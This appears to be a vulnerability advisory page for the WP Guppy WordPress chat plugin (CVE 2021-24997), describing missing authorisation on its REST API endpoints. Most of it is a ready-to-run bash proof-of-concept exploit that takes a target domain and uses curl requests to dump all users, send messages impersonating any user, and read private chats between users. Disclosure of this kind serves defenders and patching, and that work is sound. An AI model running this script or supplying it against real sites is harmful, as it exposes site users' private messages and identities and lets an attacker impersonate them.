WP Guppy < 1.3 – Sensitive Information Disclosure | CVE 2021-24997

Description

The plugin does not have any authorisation in some of the REST API endpoints, allowing any user to call them and could lead to sensitive information disclosure, such as usernames and chats between users, as well as be able to send messages as an arbitrary user

Proof of Concept

#!/bin/bash
#Exploit Title: Wordpress Plugin WP Guppy A live chat - WP-JSON API Sensitive Information Disclosure
#Exploit Author: Keyvan Hardani
#Date: 22/11/2021
#Vendor Homepage: https://wp-guppy.com/
#Version: up to 1.1
#Tested on: Kali Linux - Windows 10 - Wordpress 5.8.x and apache2
#Usage ./exploit.sh -h

Help()
{
   # Display Help
   echo "Usage"
   echo
   echo "Wordpress Plugin WP Guppy - A live chat - WP_JSON API Sensitive Information Disclosure"
   echo
   echo "Option 1: Get all users ( ./exploit.sh 1 domain.com)"
   echo "Option 2: Send message from / to other users ( ./exploit.sh 2 domain.com 1493 1507 ) => Senderid=1493 & Receiverid=1507" 
   echo "Option 3: Get the chats between users ( ./exploit.sh 3 domain.com 1507 1493) => Receiverid=1493 & Userid= 1493" 
   echo "-h  Print this Help."
   echo
}

while getopts ":h" option; do
   case $option in
      h) # display Help
         Help
         exit;;
   esac
done

if [ $1 == 1 ]
	then
	curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=" | python -m json.tool
fi

if [ $1 == 2 ]
	then
	curl -s -X POST --url "https://$2/wp-json/guppy/v2/send-guppy-message" --data '{"receiverId":"'$3'","userId":"'$4'","guppyGroupId":"","chatType":1,"message":"test","replyTo":"","latitude":"","longitude":"","messageType":0,"messageStatus":0,"replyId":"","timeStamp":1637583213,"messageSentTime":"November 22, 2021","metaData":{"randNum":5394},"isSender":true}' -H 'Content-Type: application/json'| python -m json.tool
fi
if [ $1 == 3 ]
	then
	curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-user-chat?offset=0&receiverId=$3&userId=$4&chatType=1" | python -m json.tool
fi